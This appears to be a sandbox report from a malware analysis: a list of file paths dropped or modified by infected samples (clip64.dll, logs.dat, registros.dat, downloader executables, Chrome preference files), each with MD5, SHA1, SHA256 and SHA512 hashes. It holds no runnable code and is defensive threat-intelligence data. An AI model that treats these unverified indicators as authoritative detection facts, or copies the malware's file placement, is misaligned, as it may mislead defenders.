SHA256 ce8340c239ef1f8981d8bd1eb1624660778cf2c15e1fb91c56db48e473789ea4
SHA512 b5413834344815455b998ebbfcb0da1da90d2190b20fce557cc72bff79f236c7a050c0b9d4f3ad31f13f74496f82a757534b7d74b8cb6da28ca79c4f6e5aaefa

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 dc8494fac8e05865b69c41a4cfadbfb2
SHA1 e887e73f63911fb39841e82f062d741b59ea029c
SHA256 3c08e84c73e9d838b0d536048a3287cbd9b0e844e86dcfa1501ec6a341376a51
SHA512 7a1c9496a84272525b2a7b5ba1f3d22f0c9e226f354c9f68f4a110ed9eb8564cd75adbafeb0f665c4cbcc21c2f19c6876e8b444c338fa65dbfe4499cdd5489df

C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll

MD5 c2f3fbbbe6d5f48a71b6b168b1485866
SHA1 1cd56cfc2dc07880b65bd8a1f5b7147633f5d553
SHA256 c7ed512058bc924045144daa16701da10f244ac12a5ea2de901e59dce6470839
SHA512 e211f18c2850987529336e0d20aa894533c1f6a8ae6745e320fd394a9481d3a956c719ac29627afd783e36e5429c0325b98e60aee2a830e75323c276c72f845a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\88ab67c2-aa7b-4b44-b37e-656d7fc2b757.tmp

MD5 9da54d489c1462f05625eda261a812e4
SHA1 46c07587011f3a28c0c075214182841fb6fb2dc3
SHA256 982c96037fd7a76ed24bec3480ce9a520591163c943d87db6c66f25e3b69fa94
SHA512 78cf67f71c9c844d379214256b8d3b96b9fd3e64881c6e635a64a4e8adf3bb1c745ecee82130db602283674e9448be880bfaf85e6ef98a0acf088570479eab21

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 30a145d07c2e62d05e34afd1cf0562d8
SHA1 d802c12415a401255b66ac6c085f99e1e42d58f8
SHA256 48f5f2c72c7e6459cde0d6e495817f365fd8d0f26229c15bd64b47060e518e50
SHA512 b1c17acaa281e0c792951a5032c5f4e66f03084215a8e631f1cf462e48560098c942da220f1bd06eac68effd3e73f9732c24cab714bf7365e4f71689b3fa0814

C:\ProgramData\fdgfghgfhg\logs.dat

MD5 e5452bd37e07ea03b62fabb8313fc416
SHA1 a370c9e527eb3b613f6c5218c1353740ae5a962c
SHA256 b7f096c66f0d5e03302359fd9c442b4c91b07f5df3ced84ccf601c3b94494e29
SHA512 836d2d30ddd30188fb90322268869cac6acd36cfc790029c905a6369a02d84d5cffcba7205514a15a440dbefaaafee17cad651860db2aa02d029e8a40e6a8ed4

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\l4.exe

MD5 d68f79c459ee4ae03b76fa5ba151a41f
SHA1 bfa641085d59d58993ba98ac9ee376f898ee5f7b
SHA256 aa50c900e210abb6be7d2420d9d5ae34c66818e0491aabd141421d175211fed6
SHA512 bd4ef3e3708df81d53b2e9050447032e8dcdcc776cf0353077310f208a30dab8f31d6ec6769d47fb6c05c642bdd7a58fb4f93d9d28e2de0efc01312fbc5e391e

C:\ProgramData\registro\registros.dat

MD5 0ea9c8ff992a7b4b2acfd924877013f2
SHA1 d982838dc317209f4b2dc2ff62fcdb174837b206
SHA256 3701c19cafcd96152d6107979b33c3728a6dec6a014e1303abb2c9a6eab0df74
SHA512 c005eb6185306ac00fc49e6ce3791e43b52d83c9a4c394c2525d92057418c19d1aa5fa92e67f2869e84b73caac5f88ed6de38c9a460aa38c3ad450cc729d01af

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AzVRM7c.exe

MD5 3567cb15156760b2f111512ffdbc1451
SHA1 2fdb1f235fc5a9a32477dab4220ece5fda1539d4
SHA256 0285d3a6c1ca2e3a993491c44e9cf2d33dbec0fb85fdbf48989a4e3b14b37630
SHA512 e7a31b016417218387a4702e525d33dd4fe496557539b2ab173cec0cb92052c750cfc4b3e7f02f3c66ac23f19a0c8a4eb6c9d2b590a5e9faeb525e517bc877ba

C:\ProgramData\fdgfghgfhg\logs.dat

MD5 a77e2262ad1ba580c1c97132986bbe46
SHA1 ffa8963a0d4fb7378537664c486a63d2a3314a76
SHA256 6a602726dfe7af9a7ed7adf93bac5938f7f6e8b26211f514188d944ea5b373b7
SHA512 e2894aa689b350e709123fb6b625c1f455dfdd0b5e594673ea5d5189b2dee6e462b9d4923bd86c8736eb73288b1d8d3009628cf479a228c24ebf47b7aa1bd66e

C:\ProgramData\registro\registros.dat

MD5 7929e4bce367ad1eb0d570c2d8df6a58
SHA1 4c864fd07869e11bd5a2ad36853cf3fb287e14be
SHA256 65456ef85679c46a963863a9ceace9a24f1dedfd46eea654f15d17b449a4e0e5
SHA512 db5c94a263f72290b99aba227d7b583cb8defe84c641d440573a57d250026cafe487c41de6a2a5d30d3184002fea8850e36632c56a85135ba94a888b5336929a